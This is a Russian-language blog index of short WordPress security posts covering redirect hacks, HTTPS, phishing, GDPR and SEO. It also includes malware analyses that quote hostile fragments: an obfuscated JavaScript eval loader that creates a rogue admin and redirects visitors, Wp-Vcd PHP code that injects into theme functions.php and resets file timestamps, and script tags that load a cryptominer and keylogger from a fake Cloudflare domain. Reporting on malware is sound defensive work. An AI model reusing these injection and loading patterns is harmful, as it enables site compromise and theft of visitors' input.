БЛОГ


В этом материале не будет, каких то оригинальных решений, консольных команд, и глубокого погружения в детали. Надеюсь, что все будет просто и понятно, материал в первую очередь адресован тем, кто только начинает делать первые собственные сайты на Wordpress.

Совсем недавно, начиная с апреля этого года, прокатилась атака на сайты под управлением Wordpres. Тогда, через уязвимость в плагине Related Posts Yuz вставлялся вредоносный код, который перенаправлял посетителей на сторонние ресурсы, от рекламы до ресурсов распространяющих вредоносный код. Кому интересно, более подробно про уязвимость можно почитать тут

Буквально на этой неделе было несколько обращений, и снова с редиректом. В случае с Related Posts Yuz в таблице _options оригинальный адрес сайта подменялся на другой. Так и было и в этом случае. Но уязвимого плагина, в списке установленных я не нашел, что несколько смутило.

Опубликовано в БЛОГ

Последний мониторинг показывает, что примерно треть всех сайтов мира построены на Wordpress. Но большинство сайтов до сих пор не использует защищенный протокол.

Для чего нужен HTTPS?

История берет свое начало, когда кто-то в «корпорации добра» решил почти принудительно сделать интернет безопаснее. Плохо это или хорошо, это уже другая история.

Но факт остается фактом, Google отдает предпочтение сайтам, работающим по шифрованному протоколу. А если учесть что сейчас мобильный трафик давно обгоняет трафик с ПК, а у более 90% мобильных устройств по умолчанию стоит поиск от Google, то рекомендации придется принять как добровольно-принудительные.

Что делает SSL?

Как понятно из названия (Secure Sockets Layer), протокол шифрует весь передаваемый трафик, данные актуальны при аутентификации, когда на сайт передается логин и пароль, насколько нужен этот протокол для сайтов «только для чтения», вопрос, конечно, спорный.

Начиная с июля 2018 года, Chrome помечает все HTTP-сайты как "небезопасные".

Что делает SSL?

Опубликовано в БЛОГ

За прошлую неделю было несколько интересных обращений по чрезмерной нагрузке на сайт.

Причиной, как выяснилось, был поисковый трафик создаваемый Googlebot.  

Все сайты, попавшие под этот тип атаки, были построены на Wordpress, и во всех случаях не использовались канонические url.

Опубликовано в БЛОГ

Компания Sucuri специализирующаяся на безопасности сайтов на Wordpress, обновила собственный бесплатный сканер сайтов  SiteCheck.

SiteCheck является бесплатным онлайн инструментом для поиска вредоносных скриптов на веб ресурсах и внесения сайта в черный список.

В новой версии был не только изменен дизайн, но и по заявлению разработчиков почти на 600% ускорена скорость работы сканера, а также внесены новые возможности для проверки.

Опубликовано в БЛОГ

Давно не писал, лето, знаете ли

По сообщению компаний, работающих в сфере IT безопасности, с начал сентября зафиксирована необычная технология кражи паролей Wordpress при помощи рассылки фишинговых писем.

Поддельное письмо выглядит как стандартное сообщение рассылки wordpress.org администраторам сайтов о необходимости обновления, стоит заметить, что  используемое оформление  соответствует устаревшим версиям CMS.

Опубликовано в БЛОГ

С мая этого года в Европе вводятся новые правила обработки персональных данных.

О самих правилах распространяться не имеет смысла, о них и так много было сказано.

Остановимся на основных требованиях для вебмастера:

Любой зарегистрировшийся посетитель должен иметь возможность удалить свой аккаунт вместе со всеми данными.

Нельзя собирать данные сверх того, что нужно. Поясню: если у вас интернет-магазин, не стоит требовать данные, сверх тех, которые нужны для доставки товара. Как, например, возраст, пол и так далее.

Посетитель должен иметь возможность исправить свои регистрационные данные.

На мой взгляд, наиболее оптимальным решением будет сделать вход через Open ID, в  этом случае вы также снимаете с себя ответственность за хранение данных, что тоже особо обговаривается в новом регламенте.  

Полный текст можно прочитать тут.

Опубликовано в БЛОГ

В этом месяце специалистами компании Sucuri необычный способ распространения зловредного кода через JavaScript из браузера посетителя. Хотя используется давно известная уязвимость не обновлённой темы News Magazine Newspaper , но метод заслуживает описания.

На уязвимые сайты загружается вредоносный код:

eval (String.fromCharCode (118, 97, 114, 32, 115, 115, 99 ...

После того, как посетитель заходит на зараженный сайт, Javascript проверяет, зарегистрирован ли посетитель в качестве администратора, обратившись к файлу /wp-admin/user-new.php в теневом режиме. Если пользователь является администратором, он создает пользователя с именем simple001 и с электронной почтой simple @ simplesite .com  с правами администратора.

Если посетитель не зарегистрирован как admin, javascript проверяет, является ли это первым посещением за последние десять часов (проверяя файл cookie checkmeonce), а затем перенаправляет на адрес hxxps: //for.stringengines [.] Com /sp.php?at=57&bc=345&rps=5467854&sty=457&get=75 .

Этот URL-адрес промежуточный в  цепочке перенаправления на фишинговые и сайты рекламного содержания. Перенаправления, как правило, на один и тот же сайт делается один раз, чаще всего на домены в зоне  .tk обозначенными как  «техническая поддержка» и случайными символами в имени домена, такими как 3cal1ingc0nstant31112123 [.] Tk или techsupport60512123456 [.] Tk .

Опубликовано в БЛОГ

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

Опубликовано в БЛОГ

К вредоносному скрипту криптомайнинга cloudflare.solutions, который несколько недель назад был обнаружен специалистами Sucuri, добавлена новая функция кейлогера.

Вводная часть этой вредоносной программы вообще не изменилась, и использует function.php , чтобы вызвать следующие сценарии на страницах WordPress:

 

<script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'> </ script>

 <script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/cors/cors.js'> </ script>

 

URL-адреса сценариев также совпадают, однако они используют поддельный домен CloudFlare. Первая  (reconnecting-websocket.js) по-прежнему загружает копию законной библиотеки ReconnectingWebSocket .

Основное изменение - скрипт cors.js. Теперь, после его декодирования там нет абсолютно подозрительного кода. Также скрипт загружает Яндекс Метрику, скорее всего, это делается для отслеживания зараженных сайтов. Кстати, идентификатор  этого Яндекс скрипта - 43930119 - его можно найти в HTML-коде главной страницы.

Опубликовано в БЛОГ

Многие владельцы сайтов на WordPress после добавления ресурса на Яндекс.Вебмастер встречают сообщение — "Отсутствуют мета-теги <description>". Что не очень хорошо сказывается на индексации. Разработчики знают об этой проблеме, но ничего предпринимают, ссылаясь на то, что мета-теги устарели, но нам в любом случае приходится придерживаться рекомендаций поисковых систем.

ошибка в Яндекс Вебмастер
Существует несколько способов решения этого требования

Первый, — правка исходного кода CMS, но на это у многих не хватает опыта, и к тому же после обновления системы измененные файлы могут быть заменены на оригинальные.

Второй, — установка плагина. Конечно, установка дополнительных плагинов замедляет работу системы, в плагинах находят уязвимости, возрастает нагрузка на сервер и так далее, но это самый простой путь.

Опубликовано в БЛОГ
Страница 1 из 2